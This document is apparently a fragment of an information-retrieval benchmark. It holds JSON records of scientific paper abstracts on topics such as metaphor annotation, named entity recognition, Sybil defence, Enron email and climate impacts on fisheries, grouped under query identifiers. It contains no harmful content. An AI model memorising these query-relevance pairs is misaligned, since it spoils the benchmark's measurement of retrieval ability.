"text": "Much computational work has been done on identifying and interpreting the meaning of metaphors, but little work has been done on understanding the motivation behind the use of metaphor. To computationally model discourse and social positioning in metaphor, we need a corpus annotated with metaphors relevant to speaker intentions. This paper reports a corpus study as a first step towards computational work on social and discourse functions of metaphor. We use Amazon Mechanical Turk (MTurk) to annotate data from three web discussion forums covering distinct domains. We then compare these to annotations from our own annotation scheme which distinguish levels of metaphor with the labels: nonliteral, conventionalized, and literal. Our hope is that this work raises questions about what new work needs to be done in order to address the question of how metaphors are used to achieve social goals in interaction.",
"title": ""
},
{
"docid": "63a6fc3be6322d5020e71140a88bc1cf",
"text": "We present a new architecture for named entity recognition. Our model employs multiple independent bidirectional LSTM units across the same input and promotes diversity among them by employing an inter-model regularization term. By distributing computation across multiple smaller LSTMs we find a reduction in the total number of parameters. We find our architecture achieves state-of-the-art performance on the CoNLL 2003 NER dataset.",
"title": ""
},
{
"docid": "eda6795cb79e912a7818d9970e8ca165",
"text": "This study aimed to examine the relationship between maximum leg extension strength and sprinting performance in youth elite male soccer players. Sixty-three youth players (12.5 ± 1.3 years) performed 5 m, flying 15 m and 20 m sprint tests and a zigzag agility test on a grass field using timing gates. Two days later, subjects performed a one-repetition maximum leg extension test (79.3 ± 26.9 kg). Weak to strong correlations were found between leg extension strength and the time to perform 5 m (r = -0.39, p = 0.001), flying 15 m (r = -0.72, p < 0.001) and 20 m (r = -0.67, p < 0.001) sprints; between body mass and 5 m (r = -0.43, p < 0.001), flying 15 m (r = -0.75, p < 0.001), 20 m (r = -0.65, p < 0.001) sprints and agility (r =-0.29, p < 0.001); and between height and 5 m (r = -0.33, p < 0.01) and flying 15 m (r = -0.74, p < 0.001) sprints. Our results show that leg muscle strength and anthropometric variables strongly correlate with sprinting ability. This suggests that anthropometric characteristics should be considered to compare among youth players, and that youth players should undergo strength training to improve running speed.",
"title": ""
},
{
"docid": "732edb7fe28fa894fd186c5512e8cb8d",
"text": "In knowledge management literature it is often pointed out that it is important to distinguish between data, information and knowledge. The generally accepted view sees data as simple facts that become information as data is combined into meaningful structures, which subsequently become knowledge as meaningful information is put into a context and when it can be used to make predictions. This view sees data as a prerequisite for information, and information as a prerequisite for knowledge. In this paper, I will explore the conceptual hierarchy of data, information and knowledge, showing that data emerges only after we have information, and that information emerges only after we already have knowledge. The reversed hierarchy of knowledge is shown to lead to a different approach in developing information systems that support knowledge management and organizational memory. It is also argued that this difference may have major implications for organizational flexibility and renewal.",
"title": ""
},
{
"docid": "9ddca15b5f6cc4e13a55b1d4360c03b4",
"text": "The substantial growth in online social networks has vastly expanded the potential impact of electronic word of mouth (eWOM) on consumer purchasing decisions. A critical literature review exposed that there is limited research on the impact of online consumer reviews on online purchasing decisions of Saudi Arabian consumers. This research reports on results of a study on the effects of online reviews on Saudi citizens' online purchasing decisions. The results show that Saudi Internet shoppers are very much influenced by eWOM, and that a larger percentage of them are dependent on such online forums when making decisions to purchase products through the Internet.",
"title": ""
},
{
"docid": "c625e9d1bb6cdb54864ab10ae2b0e060",
"text": "This special issue of the proceedings of the IEEE presents a systematical and complete tutorial on digital television (DTV), produced by a team of DTV experts worldwide. This introductory paper puts the current DTV systems into perspective and explains the historical background and different evolution paths that each system took. The main focus is on terrestrial DTV systems, but satellite and cable DTV are also covered,as well as several other emerging services.",
"title": ""
},
{
"docid": "b1a5c91ce404a95fea0bea45277b75e0",
"text": "Flocking behaviour in Multi-agent Systems (MAS) has attracted tremendous attention amongst researchers in the recent past due to its potential applications in various fields where distributed work environment is desired. The flocking algorithms have the potential to introduce self-organizing, self-healing and selfconfiguring capabilities in the functioning of a distributed system. The flocking algorithms exploit various artificial intelligence techniques, mathematical potential functions and geometric approaches to realize the global objectives by controlling local parameters. The main parameters of characterization of any flocking algorithm consist of mathematical models of agents, their hierarchical or flat control structures and the control approach by which these agents are controlled to exhibit flocking behaviour along with any type of formational constraints. A rigorous survey study of flocking algorithms for agents in MAS in the perspective of various instances of agents shows that there lies a huge scope for the researchers to apply, experiment and analyse various techniques locally to achieve global objectives. This paper surveys the flocking algorithms in perspective of these parameters.",
"title": ""
},
{
"docid": "cbf856284155b7ad6a48ca2fdc758df2",
"text": "We present an image caption system that addresses new challenges of automatically describing images in the wild. The challenges include generating high quality caption with respect to human judgments, out-of-domain data handling, and low latency required in many applications. Built on top of a state-of-the-art framework, we developed a deep vision model that detects a broad range of visual concepts, an entity recognition model that identifies celebrities and landmarks, and a confidence model for the caption output. Experimental results show that our caption engine outperforms previous state-of-the-art systems significantly on both in-domain dataset (i.e. MS COCO) and out-of-domain datasets. We also make the system publicly accessible as a part of the Microsoft Cognitive Services.",
"title": ""
},
{
"docid": "85b77b88c2a06603267b770dbad8ec73",
"text": "Many errors in coreference resolution come from semantic mismatches due to inadequate world knowledge. Errors in named-entity linking (NEL), on the other hand, are often caused by superficial modeling of entity context. This paper demonstrates that these two tasks are complementary. We introduce NECO, a new model for named entity linking and coreference resolution, which solves both problems jointly, reducing the errors made on each. NECO extends the Stanford deterministic coreference system by automatically linking mentions to Wikipedia and introducing new NEL-informed mention-merging sieves. Linking improves mention-detection and enables new semantic attributes to be incorporated from Freebase, while coreference provides better context modeling by propagating named-entity links within mention clusters. Experiments show consistent improvements across a number of datasets and experimental conditions, including over 11% reduction in MUC coreference error and nearly 21% reduction in F1 NEL error on ACE 2004 newswire data.",
"title": ""
}
] | scidocsrr |
edf9c1e2247da5cf7f333e3cf35cde1c | SybilGuard: Defending Against Sybil Attacks via Social Networks | [
{
"docid": "6c3f320eda59626bedb2aad4e527c196",
"text": "Though research on the Semantic Web has progressed at a steady pace, its promise has yet to be realized. One major difficulty is that, by its very nature, the Semantic Web is a large, uncensored system to which anyone may contribute. This raises the question of how much credence to give each source. We cannot expect each user to know the trustworthiness of each source, nor would we want to assign top-down or global credibility values due to the subjective nature of trust. We tackle this problem by employing a web of trust, in which each user provides personal trust values for a small number of other users. We compose these trusts to compute the trust a user should place in any other user in the network. A user is not assigned a single trust rank. Instead, different users may have different trust values for the same user. We define properties for combination functions which merge such trusts, and define a class of functions for which merging may be done locally while maintaining these properties. We give examples of specific functions and apply them to data from Epinions and our BibServ bibliography server. Experiments confirm that the methods are robust to noise, and do not put unreasonable expectations on users. We hope that these methods will help move the Semantic Web closer to fulfilling its promise.",
"title": ""
}
] | [
{
"docid": "2b3939e2bc0b0a6bf95a3b97bfda8da6",
"text": "We generalise Spatial Transformer Networks (STN) by replacing the parametric transformation of a fixed, regular sampling grid with a deformable, statistical shape model which is itself learnt. We call this a Statistical Transformer Network (StaTN). By training a network containing a StaTN end-to-end for a particular task, the network learns the optimal nonrigid alignment of the input data for the task. Moreover, the statistical shape model is learnt with no direct supervision (such as landmarks) and can be reused for other tasks. Besides training for a specific task, we also show that a StaTN can learn a shape model using generic loss functions. This includes a loss inspired by the minimum description length principle in which an appearance model is also learnt from scratch. In this configuration, our model learns an active appearance model and a means to fit the model from scratch with no supervision at all, even identity labels.",
"title": ""
},
{
"docid": "ac2a980bb528c6747062195017f155c0",
"text": "Dimension reduction is commonly defined as the process of mapping high-dimensional data to a lower-dimensional embedding. Applications of dimension reduction include, but are not limited to, filtering, compression, regression, classification, feature analysis, and visualization. We review methods that compute a point-based visual representation of high-dimensional data sets to aid in exploratory data analysis. The aim is not to be exhaustive but to provide an overview of basic approaches, as well as to review select state-of-the-art methods. Our survey paper is an introduction to dimension reduction from a visualization point of view. Subsequently, a comparison of state-of-the-art methods outlines relations and shared research foci. 1998 ACM Subject Classification G.3 Multivariate Statistics; I.2.6 Learning; G.1.2 Approximation",
"title": ""
},
{
"docid": "1bf69a2bffe2652e11ff8ec7f61b7c0d",
"text": "This research proposes and validates a design theory for digital platforms that support online communities (DPsOC). It addresses ways in which digital platforms can effectively support social interactions in online communities. Drawing upon prior literature on IS design theory, online communities, and platforms, we derive an initial set of propositions for designing effective DPsOC. Our overarching proposition is that three components of digital platform architecture (core, interface, and complements) should collectively support the mix of the three distinct types of social interaction structures of online community (information sharing, collaboration, and collective action). We validate the initial propositions and generate additional insights by conducting an in-depth analysis of an European digital platform for elderly care assistance. We further validate the propositions by analyzing three widely used digital platforms, including Twitter, Wikipedia, and Liquidfeedback, and we derive additional propositions and insights that can guide DPsOC design. We discuss the implications of this research for research and practice. Journal of Information Technology advance online publication, 10 February 2015; doi:10.1057/jit.2014.37",
"title": ""
},
{
"docid": "2493570aa0a224722a07e81c9aab55cd",
"text": "A Smart Tailor Platform is proposed as a venue to integrate various players in garment industry, such as tailors, designers, customers, and other relevant stakeholders to automate its business processes. In, Malaysia, currently the processes are conducted manually which consume too much time in fulfilling its supply and demand for the industry. To facilitate this process, a study was conducted to understand the main components of the business operation. The components will be represented using a strategic management tool namely the Business Model Canvas (BMC). The inception phase of the Rational Unified Process (RUP) was employed to construct the BMC. The phase began by determining the basic idea and structure of the business process. The information gathered was classified into nine related dimensions and documented in accordance with the BMC. The generated BMC depicts the relationship of all the nine dimensions for the garment industry, and thus represents an integrated business model of smart tailor. This smart platform allows the players in the industry to promote, manage and fulfill supply and demands of their product electronically. In addition, the BMC can be used to assist developers in designing and developing the smart tailor platform.",
"title": ""
},
{
"docid": "deaed3405c242023f6c52a777f25ba88",
"text": "Adipose tissue is a complex, essential, and highly active metabolic and endocrine organ. Besides adipocytes, adipose tissue contains connective tissue matrix, nerve tissue, stromovascular cells, and immune cells. Together these components function as an integrated unit. Adipose tissue not only responds to afferent signals from traditional hormone systems and the central nervous system but also expresses and secretes factors with important endocrine functions. These factors include leptin, other cytokines, adiponectin, complement components, plasminogen activator inhibitor-1, proteins of the renin-angiotensin system, and resistin. Adipose tissue is also a major site for metabolism of sex steroids and glucocorticoids. The important endocrine function of adipose tissue is emphasized by the adverse metabolic consequences of both adipose tissue excess and deficiency. A better understanding of the endocrine function of adipose tissue will likely lead to more rational therapy for these increasingly prevalent disorders. This review presents an overview of the endocrine functions of adipose tissue.",
"title": ""
},
{
"docid": "ebec0e9391eff2201caec18a32807753",
"text": "We study a theoretical model that connects deep learning to finding the ground state of the Hamiltonian of a spherical spin glass. Existing results motivated from statistical physics show that deep networks have a highly non-convex energy landscape with exponentially many local minima and energy barriers beyond which gradient descent algorithms cannot make progress. We leverage a technique known as topology trivialization where, upon perturbation by an external magnetic field, the energy landscape of the spin glass Hamiltonian changes dramatically from exponentially many local minima to “total trivialization”, i.e., a constant number of local minima. There also exists a transitional regime with polynomially many local minima which interpolates between these extremes. We show that a number of regularization schemes in deep learning can benefit from this phenomenon. As a consequence, our analysis provides order heuristics to choose regularization parameters and motivates annealing schemes for these perturbations.",
"title": ""
},
{
"docid": "dbdc0a429784aa085c571b7c01e3399f",
"text": "A large number of deaths are caused by Traffic accidents worldwide. The global crisis of road safety can be seen by observing the significant number of deaths and injuries that are caused by road traffic accidents. In many situations the family members or emergency services are not informed in time. This results in delayed emergency service response time, which can lead to an individual’s death or cause severe injury. The purpose of this work is to reduce the response time of emergency services in situations like traffic accidents or other emergencies such as fire, theft/robberies and medical emergencies. By utilizing onboard sensors of a smartphone to detect vehicular accidents and report it to the nearest emergency responder available and provide real time location tracking for responders and emergency victims, will drastically increase the chances of survival for emergency victims, and also help save emergency services time and resources. Keywords—Traffic accidents; accident detection; on-board sensor; accelerometer; android smartphones; real-time tracking; emergency services; emergency responder; emergency victim; SOSafe; SOSafe Go; firebase",
"title": ""
},
{
"docid": "fdab4af34adebd0d682134f3cf13d794",
"text": "Threat evaluation (TE) is a process used to assess the threat values (TVs) of air-breathing threats (ABTs), such as air fighters, that are approaching defended assets (DAs). This study proposes an automatic method for conducting TE using radar information when ABTs infiltrate into territory where DAs are located. The method consists of target asset (TA) prediction and TE. We divide a friendly territory into discrete cells based on the effective range of anti-aircraft missiles. The TA prediction identifies the TA of each ABT by predicting the ABT’s movement through cells in the territory via a Markov chain, and the cell transition is modeled by neural networks. We calculate the TVs of the ABTs based on the TA prediction results. A simulation-based experiment revealed that the proposed method outperformed TE based on the closest point of approach or the radial speed vector methods. © 2016 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "501b53d23ed15b5552eaaeec27520951",
"text": "Similarity join is the problem of finding pairs of records with similarity score greater than some threshold. In this paper we study the problem of scaling up similarity join for different metric distance functions using MapReduce. We propose a ClusterJoin framework that partitions the data space based on the underlying data distribution, and distributes each record to partitions in which they may produce join results based on the distance threshold. We design a set of strong candidate filters specific to different distance functions using a novel bisector-based framework, so that each record only needs to be distributed to a small number of partitions while still guaranteeing correctness. To address data skewness, which is common for high dimensional data, we further develop a dynamic load balancing scheme using sampling, which provides strong probabilistic guarantees on the size of partitions, and greatly improves scalability. Experimental evaluation using real data sets shows that our approach is considerably more scalable compared to state-ofthe-art algorithms, especially for high dimensional data with low distance thresholds.",
"title": ""
},
{
"docid": "434e3993775d1147c962e04f2706e3a1",
"text": "The aim of mining and analysis of Apps in Google Play, the largest Android app store, is to provide in-depth insight on the hidden properties of the repository to app developers or app market contributors. This approach can help them to view the current circumstances of the market and make valuable decisions before releasing products. To perform this analysis, all available features (descriptions of the app, app developer information, app version, updating date, category, number of download, app size, user rating, number of participants in rating, price, user reviews and security policies) are collected for the repository and stored in structured profile for each app. This scientific study is mainly divided into two approaches: measuring pair-wise correlations between extracted features and clustering the dataset into number of groups with functionally similar apps. Two distinct datasets are exploited to perform the study, one of which is collected from Google Play (in 2012) and another one from Android Market, the former version of Google Play (in 2011). As soon as experiments and analysis is successfully conducted, significant levels of pair-wise correlations are identified between some features for both datasets, which are further compared to achieve a generalized conclusion. Finally, cluster analysis is done to provide a similarity based recommendation system through probabilistic topic modeling method that can resolve Google Play’s deficiency upon app similarity.",
"title": ""
},
{
"docid": "3e0d7fb26382b9151f50ef18dc40b97a",
"text": "A. Redish et al. (2007) proposed a reinforcement learning model of context-dependent learning and extinction in conditioning experiments, using the idea of \"state classification\" to categorize new observations into states. In the current article, the authors propose an interpretation of this idea in terms of normative statistical inference. They focus on renewal and latent inhibition, 2 conditioning paradigms in which contextual manipulations have been studied extensively, and show that online Bayesian inference within a model that assumes an unbounded number of latent causes can characterize a diverse set of behavioral results from such manipulations, some of which pose problems for the model of Redish et al. Moreover, in both paradigms, context dependence is absent in younger animals, or if hippocampal lesions are made prior to training. The authors suggest an explanation in terms of a restricted capacity to infer new causes.",
"title": ""
},
{
"docid": "283285c4cbef271ac2d43e835f8a0b5c",
"text": "Cooperative behavior is a desired trait in many fields from computer games to robotics. Yet, achieving cooperative behavior is often difficult, as maintaining shared information about the dynamics of agents in the world can be complex. We focus on the specific task of cooperative pathfinding and introduce a new approach based on the idea of “direction maps” that learns about the movement of agents in the world. This learned data then is used to produce implicit cooperation between agents. This approach is less expensive and has better performance than several existing cooperative algorithms.",
"title": ""
},
{
"docid": "e3b92d76bb139d0601c85416e8afaca4",
"text": "Conventional supervised object recognition methods have been investigated for many years. Despite their successes, there are still two suffering limitations: (1) various information of an object is represented by artificial features only derived from RGB images, (2) lots of manually labeled data is required by supervised learning. To address those limitations, we propose a new semi-supervised learning framework based on RGB and depth (RGB-D) images to improve object recognition. In particular, our framework has two modules: (1) RGB and depth images are represented by convolutional-recursive neural networks to construct high level features, respectively, (2) co-training is exploited to make full use of unlabeled RGB-D instances due to the existing two independent views. Experiments on the standard RGB-D object dataset demonstrate that our method can compete against with other state-of-the-art methods with only 20% labeled data.",
"title": ""
},
{
"docid": "17813a603f0c56c95c96f5b2e0229026",
"text": "Geographic ranges are estimated for brachiopod and bivalve species during the late Middle (mid-Givetian) to the middle Late (terminal Frasnian) Devonian to investigate range changes during the time leading up to and including the Late Devonian biodiversity crisis. Species ranges were predicted using GARP (Genetic Algorithm using Rule-set Prediction), a modeling program developed to predict fundamental niches of modern species. This method was applied to fossil species to examine changing ranges during a critical period of Earth’s history. Comparisons of GARP species distribution predictions with historical understanding of species occurrences indicate that GARP models predict accurately the presence of common species in some depositional settings. In addition, comparison of GARP distribution predictions with species-range reconstructions from geographic information systems (GIS) analysis suggests that GARP modeling has the potential to predict species ranges more completely and tailor ranges more specifically to environmental parameters than GIS methods alone. Thus, GARP modeling is a potentially useful tool for predicting fossil species ranges and can be used to address a wide array of palaeontological problems. The use of GARP models allows a statistical examination of the relationship of geographic range size with species survival during the Late Devonian. Large geographic range was statistically associated with species survivorship across the crisis interval for species examined in the linguiformis Zone but not for species modeled in the preceding Lower varcus or punctata zones. The enhanced survival benefit of having a large geographic range, therefore, appears to be restricted to the biodiversity crisis interval.",
"title": ""
},
{
"docid": "0be92a74f0ff384c66ef88dd323b3092",
"text": "When facing uncertainty, adaptive behavioral strategies demand that the brain performs probabilistic computations. In this probabilistic framework, the notion of certainty and confidence would appear to be closely related, so much so that it is tempting to conclude that these two concepts are one and the same. We argue that there are computational reasons to distinguish between these two concepts. Specifically, we propose that confidence should be defined as the probability that a decision or a proposition, overt or covert, is correct given the evidence, a critical quantity in complex sequential decisions. We suggest that the term certainty should be reserved to refer to the encoding of all other probability distributions over sensory and cognitive variables. We also discuss strategies for studying the neural codes for confidence and certainty and argue that clear definitions of neural codes are essential to understanding the relative contributions of various cortical areas to decision making.",
"title": ""
},
{
"docid": "93adb6d22531c0ec6335a7bec65f4039",
"text": "The term stroke-based rendering collectively describes techniques where images are generated from elements that are usually larger than a pixel. These techniques lend themselves well for rendering artistic styles such as stippling and hatching. This paper presents a novel approach for stroke-based rendering that exploits multi agent systems. RenderBots are individual agents each of which in general represents one stroke. They form a multi agent system and undergo a simulation to distribute themselves in the environment. The environment consists of a source image and possibly additional G-buffers. The final image is created when the simulation is finished by having each RenderBot execute its painting function. RenderBot classes differ in their physical behavior as well as their way of painting so that different styles can be created in a very flexible way.",
"title": ""
},
{
"docid": "2cd3e74031bdbfdae29ea961933b3cfe",
"text": "In this paper, a prototype automotive radar sensor is presented that is capable of generating simultaneously multiple transmit (TX) beams. The system is based on a four-channel 77-GHz frequency-modulated continuous-wave (FMCW) radar system. The number of beams, their radiated power, steering angle, and beam pattern can be changed adaptively. This is achieved by the utilization of orthogonal waveforms applied to different beams in combination with digital beamforming on the receive side. Key components are vector modulators in the TX path controlled by digital-to-analog converters. The performance of the system is shown in measurements focused on beam pattern, signal-to-noise ratio, and susceptibility in case of interfering targets at cross-range. Measurement results are discussed and compared to theory and simulations. Furthermore, crest factor minimization of the vector modulator's control signals is introduced and used to increase the achievable TX power, which will be also shown in measurements.",
"title": ""
},
{
"docid": "6be148b33b338193ffbde2683ddc8991",
"text": "Predicting stock exchange rates is receiving increasing attention and is a vital financial problem as it contributes to the development of effective strategies for stock exchange transactions. The forecasting of stock price movement in general is considered to be a thought-provoking and essential task for financial time series' exploration. In this paper, a Least Absolute Shrinkage and Selection Operator (LASSO) method based on a linear regression model is proposed as a novel method to predict financial market behavior. LASSO method is able to produce sparse solutions and performs very well when the numbers of features are less as compared to the number of observations. Experiments were performed with Goldman Sachs Group Inc. stock to determine the efficiency of the model. The results indicate that the proposed model outperforms the ridge linear regression model.",
"title": ""
},
{
"docid": "c460660e6ea1cc38f4864fe4696d3a07",
"text": "Background. The effective development of healthcare competencies poses great educational challenges. A possible approach to provide learning opportunities is the use of augmented reality (AR) where virtual learning experiences can be embedded in a real physical context. The aim of this study was to provide a comprehensive overview of the current state of the art in terms of user acceptance, the AR applications developed and the effect of AR on the development of competencies in healthcare. Methods. We conducted an integrative review. Integrative reviews are the broadest type of research review methods allowing for the inclusion of various research designs to more fully understand a phenomenon of concern. Our review included multi-disciplinary research publications in English reported until 2012. Results. 2529 research papers were found from ERIC, CINAHL, Medline, PubMed, Web of Science and Springer-link. Three qualitative, 20 quantitative and 2 mixed studies were included. Using a thematic analysis, we've described three aspects related to the research, technology and education. This study showed that AR was applied in a wide range of topics in healthcare education. Furthermore acceptance for AR as a learning technology was reported among the learners and its potential for improving different types of competencies. Discussion. AR is still considered as a novelty in the literature. Most of the studies reported early prototypes. Also the designed AR applications lacked an explicit pedagogical theoretical framework. Finally the learning strategies adopted were of the traditional style 'see one, do one and teach one' and do not integrate clinical competencies to ensure patients' safety.",
"title": ""
},
{
"docid": "fa16577051c16a7f8aeb3c4c206a3c60",
"text": "Visual question answering (VQA) is a recently proposed artificial intelligence task that requires a deep understanding of both images and texts. In deep learning, images are typically modeled through convolutional neural networks (CNNs) while texts are typically modeled through recurrent neural networks (RNNs). In this work, we perform a detailed analysis on the natural language questions in VQA, which raises a different need for text representations as compared to other natural language processing tasks. Based on the analysis, we propose to rely on CNNs for learning text representations. By exploring various properties of CNNs specialized for text data, we present our “CNN Inception + Gate” model for text feature extraction in VQA. The experimental results show that simply replacing RNNs with our CNN-based model improves question representations and thus the overall accuracy of VQA models. In addition, our model has much fewer parameters and the computation is much faster. We also prove that the text representation requirement in VQA is more complicated and comprehensive than that in conventional natural language processing tasks. Shallow models like the fastText model, which can obtain comparable results with deep learning models in simple tasks like text classification, have poor performances in VQA.",
"title": ""
}
] | scidocsrr |
60d2b9018208dd89a85c7e6c288d0234 | MEDICATION ADMINISTRATION AND THE COMPLEXITY OF NURSING WORKFLOW | [
{
"docid": "b6a045abb9881abafae097e29f866745",
"text": "AIMS AND OBJECTIVES\nUnderstanding the processes by which nurses administer medication is critical to the minimization of medication errors. This study investigates nurses' views on the factors contributing to medication errors in the hope of facilitating improvements to medication administration processes.\n\n\nDESIGN AND METHODS\nA focus group of nine Registered Nurses discussed medication errors with which they were familiar as a result of both their own experiences and of literature review. The group, along with other researchers, then developed a semi-structured questionnaire consisting of three parts: narrative description of the error, the nurse's background and contributing factors. After the contributing factors had been elicited and verified with eight categories and 34 conditions, additional Registered Nurses were invited to participate by recalling one of the most significant medication errors that they had experienced and identifying contributing factors from those listed on the questionnaire. Identities of the hospital, patient and participants involved in the study remain confidential.\n\n\nRESULTS\nOf the 72 female nurses who responded, 55 (76.4%) believed more than one factor contributed to medication errors. 'Personal neglect' (86.1%), 'heavy workload' (37.5%) and 'new staff' (37.5%) were the three main factors in the eight categories. 'Need to solve other problems while administering drugs,''advanced drug preparation without rechecking,' and 'new graduate' were the top three of the 34 conditions. Medical wards (36.1%) and intensive care units (33.3%) were the two most error-prone places. The errors common to the two were 'wrong dose' (36.1%) and 'wrong drug' (26.4%). Antibiotics (38.9%) were the most commonly misadministered drugs.\n\n\nCONCLUSIONS\nAlthough the majority of respondents considered nurse's personal neglect as the leading factor in medication errors, analysis indicated that additional factors involving the health care system, patients' conditions and doctors' prescriptions all contributed to administration errors.\n\n\nRELEVANCE TO CLINICAL PRACTICE\nIdentification of the main factors and conditions contributing to medication errors allows clinical nurses and administration systems to eliminate situations that promote errors and to incorporate changes that minimize them, creating a safer patient environment.",
"title": ""
}
] | [
{
"docid": "bf53216a95c20d5f41b7821b05418919",
"text": "Bowlby's attachment theory is a theory of psychopathology as well as a theory of normal development. It contains clear and specific propositions regarding the role of early experience in developmental psychopathology, the importance of ongoing context, and the nature of the developmental process underlying pathology. In particular, Bowlby argued that adaptation is always the joint product of developmental history and current circumstances (never either alone). Early experience does not cause later pathology in a linear way; yet, it has special significance due to the complex, systemic, transactional nature of development. Prior history is part of current context, playing a role in selection, engagement, and interpretation of subsequent experience and in the use of available environmental supports. Finally, except in very extreme cases, early anxious attachment is not viewed as psychopathology itself or as a direct cause of psychopathology but as an initiator of pathways probabilistically associated with later pathology.",
"title": ""
},
{
"docid": "cc28e571bab9747922008e0ddfebbea4",
"text": "Rumelhart and McClelland's chapter about learning the past tense created a degree of controversy extraordinary even in the adversarial culture of modern science. It also stimulated a vast amount of research that advanced the understanding of the past tense, inflectional morphology in English and other languages, the nature of linguistic representations, relations between language and other phenomena such as reading and object recognition, the properties of artificial neural networks, and other topics. We examine the impact of the Rumelhart and McClelland model with the benefit of 25 years of hindsight. It is not clear who \"won\" the debate. It is clear, however, that the core ideas that the model instantiated have been assimilated into many areas in the study of language, changing the focus of research from abstract characterizations of linguistic competence to an emphasis on the role of the statistical structure of language in acquisition and processing.",
"title": ""
},
{
"docid": "af47d1cc068467eaee7b6129682c9ee3",
"text": "Diffusion kurtosis imaging (DKI) is gaining rapid adoption in the medical imaging community due to its ability to measure the non-Gaussian property of water diffusion in biological tissues. Compared to traditional diffusion tensor imaging (DTI), DKI can provide additional details about the underlying microstructural characteristics of the neural tissues. It has shown promising results in studies on changes in gray matter and mild traumatic brain injury where DTI is often found to be inadequate. The DKI dataset, which has high-fidelity spatio-angular fields, is difficult to visualize. Glyph-based visualization techniques are commonly used for visualization of DTI datasets; however, due to the rapid changes in orientation, lighting, and occlusion, visually analyzing the much more higher fidelity DKI data is a challenge. In this paper, we provide a systematic way to manage, analyze, and visualize high-fidelity spatio-angular fields from DKI datasets, by using spherical harmonics lighting functions to facilitate insights into the brain microstructure.",
"title": ""
},
{
"docid": "48e48660a711f1cf2d4d7703368b73c9",
"text": "Growing evidence suggests that transcriptional regulators and secreted RNA molecules encapsulated within membrane vesicles modify the phenotype of target cells. Membrane vesicles, actively released by cells, represent a mechanism of intercellular communication that is conserved evolutionarily and involves the transfer of molecules able to induce epigenetic changes in recipient cells. Extracellular vesicles, which include exosomes and microvesicles, carry proteins, bioactive lipids, and nucleic acids, which are protected from enzyme degradation. These vesicles can transfer signals capable of altering cell function and/or reprogramming targeted cells. In the present review we focus on the extracellular vesicle-induced epigenetic changes in recipient cells that may lead to phenotypic and functional modifications. The relevance of these phenomena in stem cell biology and tissue repair is discussed.",
"title": ""
},
{
"docid": "d8938884a61e7c353d719dbbb65d00d0",
"text": "Image encryption plays an important role to ensure confidential transmission and storage of image over internet. However, a real–time image encryption faces a greater challenge due to large amount of data involved. This paper presents a review on image encryption techniques of both full encryption and partial encryption schemes in spatial, frequency and hybrid domains.",
"title": ""
},
{
"docid": "cab0fd454701c0b302040a1875ab2865",
"text": "They are susceptible to a variety of attacks, including node capture, physical tampering, and denial of service, while prompting a range of fundamental research challenges.",
"title": ""
},
{
"docid": "57dbe095ca124fbf0fc394b927e9883f",
"text": "How much is 131 million US dollars? To help readers put such numbers in context, we propose a new task of automatically generating short descriptions known as perspectives, e.g. “$131 million is about the cost to employ everyone in Texas over a lunch period”. First, we collect a dataset of numeric mentions in news articles, where each mention is labeled with a set of rated perspectives. We then propose a system to generate these descriptions consisting of two steps: formula construction and description generation. In construction, we compose formulae from numeric facts in a knowledge base and rank the resulting formulas based on familiarity, numeric proximity and semantic compatibility. In generation, we convert a formula into natural language using a sequence-to-sequence recurrent neural network. Our system obtains a 15.2% F1 improvement over a non-compositional baseline at formula construction and a 12.5 BLEU point improvement over a baseline description generation.",
"title": ""
},
{
"docid": "b99207292a098761d1bb5cc220cf0790",
"text": "Many researchers have attempted to predict the Enron corporate hierarchy from the data. This work, however, has been hampered by a lack of data. We present a new, large, and freely available gold-standard hierarchy. Using our new gold standard, we show that a simple lower bound for social network-based systems outperforms an upper bound on the approach taken by current NLP systems.",
"title": ""
},
{
"docid": "c4e7c757ad5a67b550d09f530b5204ef",
"text": "This paper describes our effort for a planning-based computational model of narrative generation that is designed to elicit surprise in the reader's mind, making use of two temporal narrative devices: flashback and foreshadowing. In our computational model, flashback provides a backstory to explain what causes a surprising outcome, while foreshadowing gives hints about the surprise before it occurs. Here, we present Prevoyant, a planning-based computational model of surprise arousal in narrative generation, and analyze the effectiveness of Prevoyant. The work here also presents a methodology to evaluate surprise in narrative generation using a planning-based approach based on the cognitive model of surprise causes. The results of the experiments that we conducted show strong support that Prevoyant effectively generates a discourse structure for surprise arousal in narrative.",
"title": ""
},
{
"docid": "e4a13888d88b3d7df1956813c06c4fd9",
"text": "Climate change is predicted to have a range of direct and indirect impacts on marine and freshwater capture fisheries, with implications for fisheries-dependent economies, coastal communities and fisherfolk. This technical paper reviews these predicted impacts, and introduces and applies the concepts of vulnerability, adaptation and adaptive capacity. Capture fisheries are largely driven by fossil fuels and so contribute to greenhouse gas emissions through fishing operations, estimated at 40-130 Tg CO2. Transportation of catches is another source of emissions, which are uncertain due to modes and distances of transportation but may exceed those from fishing operations. Mitigation measures may impact on fisheries by increasing the cost of fossil fuel use. Fisheries and fisherfolk may be impacted in a wide range of ways due to climate change. These include biophysical impacts on the distribution or productivity of marine and freshwater fish stocks through processes such as ocean acidification, habitat damage, changes in oceanography, disruption to precipitation and freshwater availability. Fisheries will also be exposed to a diverse range of direct and indirect climate impacts, including displacement and migration of human populations; impacts on coastal communities and infrastructure due to sea level rise; and changes in the frequency, distribution or intensity of tropical storms. Fisheries are dynamic social-ecological systems and are already experiencing rapid change in markets, exploitation and governance, ensuring a constantly developing context for future climate-related impacts. These existing socioeconomic trends and the indirect effects of climate change may interact with, amplify or even overwhelm biophysical impacts on fish ecology. The variety of different impact mechanisms, complex interactions between social, ecological and economic systems, and Climate change implications for fisheries and aquaculture – Overview of current scientific knowledge 108 the possibility of sudden and surprising changes make future effects of climate change on fisheries difficult to predict. The vulnerability of fisheries and fishing communities depends on their exposure and sensitivity to change, but also on the ability of individuals or systems to anticipate and adapt. This adaptive capacity relies on various assets and can be constrained by culture or marginalization. Vulnerability varies between countries and communities, and between demographic groups within society. Generally, poorer and less empowered countries and individuals are more vulnerable to climate impacts, and the vulnerability of fisheries is likely to be higher where they already suffer from overexploitation or overcapacity. Adaptation to climate impacts includes reactive or anticipatory actions by individuals or public institutions. These range from abandoning fisheries altogether for alternative occupations, to developing insurance and warning systems and changing fishing operations. Governance of fisheries affects the range of adaptation options available and will need to be flexible enough to account for changes in stock distribution and abundance. Governance aimed towards equitable and sustainable fisheries, accepting inherent uncertainty, and based on an ecosystem approach, as currently advocated, is thought to generally improve the adaptive capacity of fisheries. However, adaptation may be costly and limited in scope, so that mitigation of emissions to minimise climate change remain a key responsibility of governments. ACKNOWLEDGEMENTS This report was compiled with input from Eddie Allison from the WorldFish Center, Penang, and benefited from the comments of participants at the FAO Workshop on Climate Change Implications 